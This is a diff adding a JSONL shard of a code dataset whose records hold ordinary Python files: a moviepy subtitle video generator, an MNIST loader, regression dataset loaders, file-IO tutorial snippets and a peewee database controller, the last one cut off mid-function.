diff --git "a/6632.jsonl" "b/6632.jsonl" new file mode 100644--- /dev/null +++ "b/6632.jsonl" @@ -0,0 +1,742 @@ +{"seq_id":"130525568","text":"import moviepy.editor as mpy\n\nimport pydub as pdb\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import cv2\n\nimport moviepy.video.fx.all as vfx\n\nfrom collections import defaultdict\n\nimport moviepy.video.fx.all as vfx\nimport os\n\n# CONSTANTS\nPREVIEW_SIZE = (1280, 720)\n#PRODUCTION_SIZE = (1024, 768)\n\ndef resize_and_fit(origin_clip, video_size):\n new_size = (0, 0) # init the value\n if origin_clip.h / origin_clip.w > PREVIEW_SIZE[1] / PREVIEW_SIZE[0]: # EH: when the image is square, change it according to video size\n new_size = ((origin_clip.w * video_size[1] / origin_clip.h),video_size[1])\n else:\n new_size = ((video_size[0], origin_clip.h * video_size[0] / origin_clip.w))\n clip = origin_clip.resize(new_size).on_color(video_size)\n return clip\n\ndef set_scene_dur(origin_clip, dur, fps=25):\n clip = origin_clip.set_duration(dur).set_fps(fps)\n return clip\n\ndef set_img_dur(origin_clip, dur, fps=25):\n clip = origin_clip.set_duration(dur).set_fps(fps)\n return clip\n\ndef set_video_dur(origin_clip, dur, fps=25):\n clip = vfx.speedx(origin_clip, final_duration=dur).set_fps(fps)\n return clip\n\ndef generate_subtitles_clip(subtitles, fontsize=60, color=\"white\", stroke_width=2, stroke_color=\"black\"):\n '''\n params:\n * subtitles: parse script\n '''\n text_clips = []\n \n for content in subtitles:\n if isinstance(content, SContent):\n text_content = mpy.TextClip(content.text,\n color=color,\n stroke_color= stroke_color,\n stroke_width= stroke_width,\n font=\"ArialUnicode\", # TODO: change the font\n fontsize=fontsize\n )\n text_on_color = text_content.on_color(PREVIEW_SIZE, pos=('center', 'bottom') ,col_opacity=0)\n text_clip = text_on_color.set_duration(content.dur)\n text_clips.append(text_clip)\n # EH: add some spaces between subtitles\n \n return mpy.concatenate_videoclips(text_clips)\n\n\nclass SCommand():\n \n def __init__(self, command_str):\n self.command_str = command_str\n self.command_parsed = defaultdict(list)\n self.parse()\n \n def parse(self):\n command_factors = self.command_str.split()\n command_factors = [factor for factor in command_factors if factor] # Clean blank lines\n \n param_name = \"position_args\"\n\n for i in range(len(command_factors)):\n factor = command_factors[i]\n if i == 0:\n self.command_parsed['func'] = factor\n elif factor[0:2] == \"--\":\n param_name = factor[2:]\n else:\n # Append the param\n if factor.replace(\".\", \"\", 1).isdigit(): # check if it is float\n factor = float(factor)\n elif \":\" in factor:\n if factor.count(\":\") == 1: # if hour is forgot to be written\n if len(factor.split(\":\")[0]) == 1: # if 0 is forgot to be written\n factor = \"00:0\" + factor\n else:\n factor = \"00:\" + factor\n\n self.command_parsed[param_name].append(factor)\n\nclass SContent():\n \n def __init__(self, text, audio=0, dur=1.5):\n self.text = text\n self.audio = audio\n self.dur = dur # EH: adjust the dur according to audio\n\n # EH: change a position to set the text\n if len(self.text) > 18:\n self.text = text[:12] + \"\\n\" + text[12:]\n\ndef parse_script(script):\n script_lines = [line for line in script.split(\"\\n\") if line]\n \n parsed = []\n for line in script_lines:\n if line[0] == \"$\":\n parsed.append(SCommand(line[1:]))\n else:\n parsed.append(SContent(line))\n return parsed\n\ndef get_scene_transition_schedule(parsed_script):\n # EH: change this into index based method. 
This method is too ugly.\n '''\n return: a list of tuples like (scene_filename, dur, params)\n '''\n\n schedule = []\n \n current_scene = \"\"\n dur = 0\n params = {}\n \n for line in parsed_script:\n if isinstance(line, SCommand):\n \n if line.command_parsed[\"func\"] == \"ST\":\n if current_scene: # If 'line' is not the first scene, append the previous scene\n schedule.append((current_scene, dur, params))\n current_scene = line.command_parsed[\"position_args\"][0]\n dur = 0\n # EH: change the way params are added\n params = {\"part\": line.command_parsed['part'], \"crop\": line.command_parsed['crop']}\n else:\n if isinstance(line, SContent):\n dur += line.dur\n \n # Add the final scene after all lines are schedule\n schedule.append((current_scene, dur, params))\n \n return schedule\n\ndef scheduled_time_scene_transition(schedule, resource_folder_name=\"res\"):\n '''\n params:\n - schedule: a list of tuples of (file name, dur)\n '''\n clips = []\n print(schedule)#DEBUG\n for res, dur, params in schedule:\n # EH: use a better way to detect the type of a file\n file_name = os.path.join(resource_folder_name, res)\n if not os.path.exists(file_name):\n print(\"File not found! {}\".format(file_name))\n raise FileNotFoundError()\n file_type = res.split(\".\")[-1]\n if file_type in [\"mov\", \"mp4\", \"avi\", \"flv\"]:\n origin_video_clip = mpy.VideoFileClip(os.path.join(resource_folder_name, res), audio=False)\n if params[\"part\"]:\n #print(params[\"part\"])\n parts = params[\"part\"]\n origin_video_clip = origin_video_clip.subclip(parts[0], parts[1])\n if params[\"crop\"]:\n w = origin_video_clip.w\n h = origin_video_clip.h\n rect = params[\"crop\"]\n origin_video_clip = vfx.crop(origin_video_clip, w*rect[0], h*rect[1], w*rect[2], h*rect[3])\n clips.append(set_video_dur(resize_and_fit(origin_video_clip, PREVIEW_SIZE), dur))\n elif file_type in [\"jpg\", \"png\", \"jpeg\"]:\n origin_img_clip = mpy.ImageClip(os.path.join(resource_folder_name, res))\n if params[\"crop\"]:\n w = origin_img_clip.w\n h = origin_img_clip.h\n rect = params[\"crop\"]\n #print(\"Crop\", w, h, rect, rect[0]*w)\n origin_img_clip = vfx.crop(origin_img_clip, w*rect[0], h*rect[1], w*rect[2], h*rect[3])\n clips.append(set_img_dur(resize_and_fit(origin_img_clip, PREVIEW_SIZE), dur))\n elif file_type in [\"txt\"]:\n print(res)\n print(os.path.join(resource_folder_name, res))\n origin_txt_clip = mpy.TextClip(\n open(os.path.join(resource_folder_name, res)).read(),\n color=\"white\",\n font=\"ArialUnicode\",\n fontsize=100\n ).on_color(PREVIEW_SIZE).set_position(\"center\")\n clips.append(set_scene_dur(resize_and_fit(origin_txt_clip, PREVIEW_SIZE), dur))\n \n return mpy.concatenate_videoclips(clips)\n\ndef get_chunks(audio):\n chunks = pdb.silence.split_on_silence(audio.normalize(), min_silence_len=1000, silence_thresh=-40, keep_silence=250)\n\n new_chunks = []\n for chunk in chunks:\n dur = round(chunk.duration_seconds, 1) + 0.1\n new_chunk = (chunk + pdb.AudioSegment.silent())[:dur*1000]\n new_chunks.append(new_chunk)\n return new_chunks\n\ndef match_audio(parsed_script, chunks):\n \n # EH: normalize the volume of audio at first and then divide it into chunks\n \n for line in parsed_script:\n if isinstance(line, SContent) and chunks:\n line.audio = chunks.pop(0) # Get the main audio before chunks are removed\n line.dur = line.audio.duration_seconds\n\ndef generate_video():\n\n # Parse script\n script = \"\"\n with open(\"script.txt\", \"r\") as f:\n script = f.read()\n\n parsed_script = parse_script(script)\n print(\"Script 
parsed.\")\n\n # Generate audio\n if \"audio.wav\" in os.listdir(\".\"):\n print(\"Audio detected.\")\n chunks = get_chunks(pdb.AudioSegment.from_wav(\"audio.wav\"))\n print(\"Audio chunks generated.\")\n sum(chunks).export(\"audio_track.wav\", \"wav\")\n # Export to file first, then match\n match_audio(parsed_script, chunks)\n \n # Generate subtitles\n subtitle_clip = generate_subtitles_clip(parsed_script)\n print(\"Subtitles generated.\")\n\n # Generate scenes\n schedule = get_scene_transition_schedule(parsed_script)\n video_clip = scheduled_time_scene_transition(schedule)\n print(\"Scene generated.\")\n\n # Generate the video\n main_clip = mpy.CompositeVideoClip([video_clip, subtitle_clip])\n\n # Add the audio track\n if \"audio_track.wav\" in os.listdir(\".\"):\n audio_clip = mpy.AudioFileClip('audio_track.wav')\n if \"BGM.mp3\" in os.listdir(\".\") or \"BGM.flac\" in os.listdir(\".\"):\n audio_clip = mpy.CompositeAudioClip([mpy.AudioFileClip('audio_track.wav'), mpy.AudioFileClip(\"BGM.mp3\").volumex(0.15)])\n main_clip = main_clip.set_audio(audio_clip.set_duration(main_clip.duration))\n\n # Write the video\n main_clip.write_videofile(\"output.mp4\")\n\nif __name__ == \"__main__\":\n generate_video()\n\n","sub_path":"svmaker.py","file_name":"svmaker.py","file_ext":"py","file_size_in_byte":9524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83993009","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nfrom PIL import Image\n\nclass MNIST_data(Dataset):\n def __init__(self, main_dir=\"data\", labels=list(range(10))):\n super(MNIST_data, self).__init__()\n self.main_dir = main_dir\n self.all_folders = [main_dir+\"/{}/\".format(i) for i in range(10)]\n self.all_imgs = []\n for i in labels:\n self.all_imgs += map(lambda bla: self.all_folders[i]+bla, os.listdir(self.all_folders[i]))\n self.num_classes = len(labels)\n \n def __len__(self):\n return len(self.all_imgs)\n\n def __getitem__(self, idx):\n imgloc = self.all_imgs[idx]\n label = int(imgloc.split(\"/\")[-2])\n img = Image.open(imgloc).convert(\"L\") # L ist ein Concept Mode: https://pillow.readthedocs.io/en/stable/handbook/concepts.html#concept-modes\n img = transforms.ToTensor()(img)\n return {\"image\": img, \"label\": label}\n #img = torch.tensor(list(Image.open(imgloc)), dtype=torch.float)\n #return img\n ","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473909652","text":"import csv\nemail = []\nwith open('faculty.csv', 'r') as file:\n reader = csv.DictReader(file)\n for row in reader:\n email.append(row[' email'])\nwith open('emails.csv', 'w') as newfile:\n for i in email:\n newfile.write(str(i) + '\\n')\n ","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167868493","text":"import numpy as np\nimport pandas as pd\n\nfrom mldb._io import read_csv_data, read_xls_data, read_arff_data, construct_return_set, references\n\n__all__= ['load_airfoil',\n 'load_cpu_performance',\n 'load_forestfires',\n 'load_real_estate_valuation',\n 'load_residential_building',\n 'load_slump_test',\n 'load_stock_portfolio_performance',\n 'load_winequality_red',\n 'load_winequality_white',\n 'load_yacht_hydrodynamics',\n 
'load_ccpp',\n 'load_communities',\n 'load_diabetes',\n 'load_laser',\n 'load_autoMPG6',\n 'load_wizmir',\n 'load_wankara',\n 'load_mortgage',\n 'load_baseball',\n 'load_ele_1',\n 'load_treasury',\n 'load_compactiv',\n 'load_puma32h',\n 'summary',\n 'generate_summary_table',\n 'get_filtered_data_loaders',\n 'get_data_loaders',\n 'get_references']\n\ndef get_references():\n return references\n\ndef load_airfoil(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/airfoil/airfoil_self_noise.dat.txt', sep= '\\t')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"airfoil\", return_X_y, encode, citation= 'uci', name= \"airfoil\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_cpu_performance(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/cpu_performance/machine.data.txt', sep= ',')\n del db[db.columns[-1]]\n del db[db.columns[1]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"cpu_performance\", return_X_y, encode, citation= 'uci', name= \"cpu_performance\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_forestfires(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/forestfires/forestfires.csv', sep= ',', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"forestfires\", return_X_y, encode, citation= 'uci', name= \"forestfires\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_real_estate_valuation(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_xls_data('data/regression/real_estate_valuation/Real estate valuation data set.xlsx')\n del db[db.columns[0]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"real_estate_valuation\", return_X_y, encode, citation= 'uci', name= \"real_estate_valuation\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_residential_building(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n # target: V9\n \n db= read_xls_data('data/regression/residential_building/Residential-Building-Data-Set.xlsx')\n db= db.drop(0, axis='index')\n db.reset_index(drop=True, inplace=True)\n del db[db.columns[-1]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"residential_building\", return_X_y, encode, citation= 'uci', name= \"residential_building\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_slump_test(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/slump_test/slump_test.data.txt', sep= ',', header=0)\n del db[db.columns[0]]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"slump_test\", return_X_y, encode, citation= 'uci', name= \"slump_test\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_stock_portfolio_performance(return_X_y= False, 
encode= True, verbose= False, onehot_threshold= 10):\n # target: normalized annual return\n \n db= read_xls_data('data/regression/stock_portfolio_performance/stock portfolio performance data set.xlsx', sheet_name='all period')\n db.columns= db.iloc[0].values\n db= db.drop(db.index[0], axis='index')\n db.reset_index(drop=True, inplace=True)\n del db[db.columns[0]]\n columns= list(db.columns[0:5]) + [db.columns[11]]\n db= db[columns]\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n for c in db.columns:\n db[c]= db[c].astype(float)\n \n return construct_return_set(db, \"stock_portfolio_performance\", return_X_y, encode, citation= 'uci', name= \"stock_portfolio_performance\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_winequality_red(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/winequality_red/winequality-red.csv', sep= ';', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"winequality_red\", return_X_y, encode, citation= 'uci', name= \"winequality_red\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_winequality_white(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/winequality_white/winequality-white.csv', sep= ';', header=0)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"winequality_white\", return_X_y, encode, citation= 'uci', name= \"winequality_white\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_yacht_hydrodynamics(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/yacht_hydrodynamics/yacht_hydrodynamics.data.txt', sep= None, header=0, delim_whitespace=True)\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"yacht_hydrodynamics\", return_X_y, encode, citation= 'uci', name= \"yacht_hydrodynamics\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_ccpp(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_xls_data('data/regression/ccpp/Folds5x2_pp.xlsx', sheet_name='Sheet1')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"ccpp\", return_X_y, encode, citation= 'uci', name= \"ccpp\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_communities(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n db= read_csv_data('data/regression/communities/communities.data', sep= ',')\n columns= list(db.columns)\n columns[-1]= 'target'\n db.columns= columns\n \n return construct_return_set(db, \"communities\", return_X_y, encode, citation= 'uci', name= \"communities\", verbose= verbose, problem_type='regression', onehot_threshold=onehot_threshold)\n\ndef load_diabetes(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/diabetes/diabetes.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"diabetes\", return_X_y, encode, citation= 'keel', name= \"diabetes\", verbose= verbose, problem_type= 'regression')\n\ndef load_laser(return_X_y= 
False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/laser/laser.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"laser\", return_X_y, encode, citation= 'keel', name= \"laser\", verbose= verbose, problem_type= 'regression')\n\ndef load_autoMPG6(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/autoMPG6/autoMPG6.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"autoMPG6\", return_X_y, encode, citation= 'keel', name= \"autoMPG6\", verbose= verbose, problem_type= 'regression')\n\ndef load_wizmir(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/wizmir/wizmir.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"wizmir\", return_X_y, encode, citation= 'keel', name= \"wizmir\", verbose= verbose, problem_type= 'regression')\n\ndef load_wankara(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/wankara/wankara.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"wankara\", return_X_y, encode, citation= 'keel', name= \"wankara\", verbose= verbose, problem_type= 'regression')\n\ndef load_mortgage(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/mortgage/mortgage.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"mortgage\", return_X_y, encode, citation= 'keel', name= \"mortgage\", verbose= verbose, problem_type= 'regression')\n\ndef load_baseball(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/baseball/baseball.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"baseball\", return_X_y, encode, citation= 'keel', name= \"baseball\", verbose= verbose, problem_type= 'regression')\n\ndef load_ele_1(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/ele_1/ele-1.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"ele_1\", return_X_y, encode, citation= 'keel', name= \"ele_1\", verbose= verbose, problem_type= 'regression')\n\ndef load_treasury(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/treasury/treasury.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"treasury\", return_X_y, encode, citation= 'keel', name= \"treasury\", verbose= verbose, problem_type= 'regression')\n\ndef load_compactiv(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n data, meta= read_arff_data('data/regression/compactiv/compactiv.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"compactiv\", return_X_y, encode, citation= 'keel', name= \"compactiv\", verbose= verbose, problem_type= 'regression')\n\ndef load_puma32h(return_X_y= False, encode= True, verbose= False, onehot_threshold= 10):\n 
data, meta= read_arff_data('data/regression/puma32h/puma32h.dat')\n db= pd.DataFrame(data)\n db.columns= list(db.columns[:-1]) + ['target']\n \n return construct_return_set(db, \"puma32h\", return_X_y, encode, citation= 'keel', name= \"puma32h\", verbose= verbose, problem_type= 'regression')\n\ndef generate_summary():\n results= []\n \n for func_name in __all__:\n if func_name.startswith('load_'):\n data_encoded= globals()[func_name](return_X_y= False, encode= True)\n \n result= {'loader_function': globals()[func_name],\n 'name': data_encoded['name'],\n 'n': len(data_encoded['data']),\n 'n_attr_raw': len(data_encoded['data_raw'][0]),\n 'n_attr_encoded': len(data_encoded['data'][0])}\n \n result['reference_key']= data_encoded['citation']\n \n results.append(result)\n \n df_results= pd.DataFrame(results)\n\n return df_results\n\ndef summary():\n summary_df= pd.DataFrame(summary_table.copy(), columns=summary_columns)\n summary_df['loader_function']= summary_df['loader_function'].apply(lambda x: globals()[x])\n return summary_df\n\ndef generate_summary_table():\n results= generate_summary()\n results['loader_function']= results['loader_function'].apply(lambda x: x.__name__)\n\n return results.columns, results.values\n\ndef get_filtered_data_loaders(n_attr_encoded_bounds= [1, 5000],\n n_attr_raw_bounds= [1, 5000],\n n_bounds= [1, 10000]):\n descriptors= summary()\n return descriptors[(descriptors['n'] >= n_bounds[0]) & (descriptors['n'] < n_bounds[1]) & \n (descriptors['n_attr_encoded'] >= n_attr_encoded_bounds[0]) & (descriptors['n_attr_encoded'] < n_attr_encoded_bounds[1]) & \n (descriptors['n_attr_raw'] >= n_attr_raw_bounds[0]) & (descriptors['n_attr_raw'] < n_attr_raw_bounds[1])]['loader_function'].values\n\ndef get_data_loaders(subset='all'):\n \"\"\"\n Args:\n subset (str): 'all'/'study'/'small'/'tiny'\n \"\"\"\n \n n_attr_encoded_bounds= [1, 5000]\n n_attr_raw_bounds= [1, 5000]\n n_bounds= [1, 10000]\n \n if subset == 'study':\n n_attr_encoded_bounds[1]= 100\n n_bounds[1]= 4000\n elif subset == 'small':\n n_attr_encoded_bounds[1]= 100\n n_bounds[1]= 1000\n elif subset == 'tiny':\n n_bounds[1]= 120\n \n return get_filtered_data_loaders(n_attr_encoded_bounds= n_attr_encoded_bounds,\n n_attr_raw_bounds= n_attr_raw_bounds,\n n_bounds= n_bounds)\n\nsummary_table= np.array([\n ['load_airfoil', 1503, 5, 5, 'airfoil', 'uci'],\n ['load_cpu_performance', 209, 7, 7, 'cpu_performance', 'uci'],\n ['load_forestfires', 517, 18, 12, 'forestfires', 'uci'],\n ['load_real_estate_valuation', 414, 6, 6, 'real_estate_valuation', 'uci'],\n ['load_residential_building', 372, 107, 107, 'residential_building', 'uci'],\n ['load_slump_test', 103, 9, 9, 'slump_test', 'uci'],\n ['load_stock_portfolio_performance', 63, 6, 6, 'stock_portfolio_performance', 'uci'],\n ['load_winequality_red', 1599, 11, 11, 'winequality_red', 'uci'],\n ['load_winequality_white', 4898, 11, 11, 'winequality_white', 'uci'],\n ['load_yacht_hydrodynamics', 307, 6, 6, 'yacht_hydrodynamics', 'uci'],\n ['load_ccpp', 9568, 4, 4, 'ccpp', 'uci'],\n ['load_communities', 1994, 154, 127, 'communities', 'uci'],\n ['load_diabetes', 43, 2, 2, 'diabetes', 'keel'],\n ['load_laser', 993, 4, 4, 'laser', 'keel'],\n ['load_autoMPG6', 392, 5, 5, 'autoMPG6', 'keel'],\n ['load_wizmir', 1461, 9, 9, 'wizmir', 'keel'],\n ['load_wankara', 321, 9, 9, 'wankara', 'keel'],\n ['load_mortgage', 1049, 15, 15, 'mortgage', 'keel'],\n ['load_baseball', 337, 16, 16, 'baseball', 'keel'],\n ['load_ele_1', 495, 2, 2, 'ele_1', 'keel'],\n ['load_treasury', 1049, 15, 15, 'treasury', 
'keel'],\n ['load_compactiv', 8192, 21, 21, 'compactiv', 'keel'],\n ['load_puma32h', 8192, 32, 32, 'puma32h', 'keel']], dtype=object)\n\nsummary_columns= ['loader_function', 'n', 'n_attr_encoded', 'n_attr_raw', 'name',\n 'reference_key']","sub_path":"mldb/regression/_regression.py","file_name":"_regression.py","file_ext":"py","file_size_in_byte":15781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406332790","text":"# IO操作\n\n# 读文件 open():传入文件名和标识符'r':表示读\nf = open('/Users/dong/PythonBasis/hello.py', 'r') # 如果文件不存在,open()会抛出IOError的错误(FileNotFoundError)\ncontent = f.read()\nf.close() # 文件打开使用完之后, 必须关闭, 避免占用资源\nprint(content) # f.read() 将文件中的内容读取出来\n\n\nwith open('/Users/dong/PythonBasis/hello.py', 'r') as file: # 利用with..as..来自动关闭\n for line in file.readlines():\n print(line.strip())\n\n# f = open('/Users/michael/test.jpg', 'rb') # 'rb':读取二进制文件\n#\n# f = open('/Users/michael/gbk.txt', 'r', encoding='gbk') # 读取非UTF-8的文件 需要在后面添加文件的编码\n#\n#\n# f = open('/Users/michael/test.txt', 'w') # 'w':写文件\n# f.write('Hello, world!')\n# f.close()\n\n\n# with open('/Users/michael/test.txt', 'w') as f:\n# f.write('Hello, world!')\n\nprint('*****************************************')\n# StringIO:在内存中读写字符串\nfrom io import StringIO\nf = StringIO()\nf.write(\"hello\")\nprint('write:' + f.getvalue()) # 通过getvalue()来读取内存中的字符串\n\nf2 = StringIO('hello\\nHi\\nGoodBye')\nwhile True:\n s = f2.readline()\n if s == '':\n break\n print(s)\n\n\n# BytesIO: 操作二进制文件 StringIO只能操作字符串\nfrom io import BytesIO\nb = BytesIO()\nb.write('中文'.encode('utf-8'))\nprint(b.getvalue())\n\nb2 = BytesIO(b'\\xe4\\xb8\\xad\\xe6\\x96\\x87')\nprint(b2.getvalue())\nprint(b2.read())\n","sub_path":"learn4.py","file_name":"learn4.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"205850908","text":"#!/usr/bin/env python3\n\"\"\"Classes that hold models for dynamic database swapping.\nThese models are controllers for adding, updating, and deleting from db.\n\"\"\"\nfrom difflib import SequenceMatcher as SM\nimport utils.models as db\nimport concurrent.futures\nimport ui.settings as s\nimport utils.formatter as fm\n\n\nclass ModelCtrl:\n \"\"\"Controls all model's create, update, and delete methods\"\"\"\n def __init__(self):\n \"\"\"Switch to another db by overwriting this class by initing\n it again.\n \"\"\"\n self.page = db.Page\n self.cont = db.Content\n self.tag = db.Tag\n self.dd_info = db.DatabaseInfo\n #self.rel = db.Relations\n\n def add_page(self, data:dict) -> dict:\n \"\"\"Args:\n data: keys are name, notes, img_path, img_title\n Returns:\n res: contains Page model obj and a message for display\n \"\"\"\n p = self.page.create(\n name = data[\"name\"].title().rstrip(),\n notes = fm.format_note(data[\"notes\"]),\n img_path = \"\",\n img_title = \"\"\n )\n p.save()\n return p\n\n def add_content(self, data:dict, target):\n \"\"\"Args:\n data: {idx: {title: content}, ...}\n target: s.TARGET_PAGE\n \"\"\"\n for k, v in data.items():\n res = self.cont.create(\n page = target,\n title = v[\"title\"].title().rstrip(),\n idx = k,\n content = fm.format_content(v[\"cont\"]),\n content_img = \"\",\n content_img_title = \"\"\n )\n res.save()\n\n def update_page(self, target_name, data):\n \"\"\"Data keys: name, notes\"\"\"\n q = None\n if data[\"name\"] != \"\" and data[\"notes\"] != \"\":\n q = (db.Page.update(name=data[\"name\"], notes=fm.format_note(\n 
data[\"notes\"])).where(db.Page.name==target_name))\n q.execute()\n elif data[\"name\"] != \"\":\n q = (db.Page.update(name=data[\"name\"].title().rstrip()).\n where(db.Page.name==target_name))\n q.execute()\n else:\n q = (db.Page.update(notes=fm.format_note(data[\"notes\"])).\n where(db.Page.name==target_name))\n q.execute()\n return q\n\n def update_content(self, target_page, data):\n \"\"\"data keys: title, idx, content\n TODO: implement idx swapping\n \"\"\"\n q = None\n if data.get(\"title\", \"\") != \"\":\n q = (db.Content.update(title=data[\"title\"].title().rstrip()).\n where(db.Content.page==target_page,\n db.Content.idx==data[\"idx\"]))\n q.execute()\n else:\n q = (db.Content.update(content=fm.format_content(data[\"content\"])).\n where(db.Content.page==target_page,\n db.Content.idx==data[\"idx\"]))\n q.execute()\n return q\n\n def delete_page(self, name):\n d = self.page.delete().where(self.page.name==name)\n d.execute()\n\n def delete_content(self, page_obj):\n d = self.cont.delete().where(self.cont.page==page_obj)\n d.execute()\n\n def set_tag(self, new:str) -> str:\n \"\"\"`new` should be just the tag without commas.\"\"\"\n q = self.d_info.select()[0] # Only 1 column should exist\n res = f\"{q.set_tags},{new}\"\n save = (self.d_info.update({self.d_info.set_tags:res}).where(self.d_info.id==1))\n return f\"Made new tag {new}\"\n\nclass Query:\n def __init__(self):\n self.tag = db.Tag\n self.page = db.Page\n self.content = db.Content\n #self.rel = db.Relations\n\n def page_amt_stats(self):\n q = self.page.select()\n return len(q)\n\n def pages(self, name):\n q = self.page.select().where(self.page.name==name)\n return q\n\n def page_content(self, target):\n \"\"\"Args:\n target: s.TARGET_PAGE\n \"\"\"\n q = self.content.select().where(self.content.page==target)\n return q\n\n def full_page_match(self, name) -> list:\n p = self.page.select().where(self.page.name==name)\n if len(p) == 1:\n return p\n return []\n\n def fuzzy_percentage(self, query, target):\n return SM(None, target, query).ratio()\n\n def fuzzy_loopy(self, name, limit, tolerance) -> list:\n \"\"\"iterator method needed for less mem usage\"\"\"\n res = []\n maximum = 0\n for p in self.page.select().iterator():\n perc = self.fuzzy_percentage(p.name, name)\n if len(res) >= limit:\n break\n if perc > tolerance:\n if perc > maximum:\n maximum = perc\n res.insert(0, p)\n else:\n res.append(p)\n return res\n\n def fuzzy_page_match(self, name, pg_limit) -> list:\n limit = int(pg_limit * 1.5)\n args = [(name, limit, s.FUZZY_HI_TOLERANCE),\n (name, limit, s.FUZZY_LO_TOLERANCE)]\n with concurrent.futures.ThreadPoolExecutor() as executor:\n results = [executor.submit(self.fuzzy_loopy, n, lim, tol)\n for n, lim, tol in args]\n if results[0].result() == []:\n return results[1].result()\n return results[0].result()\n\n def suggestions_match(self, name) -> list:\n res = []\n maximum = 0\n for p in 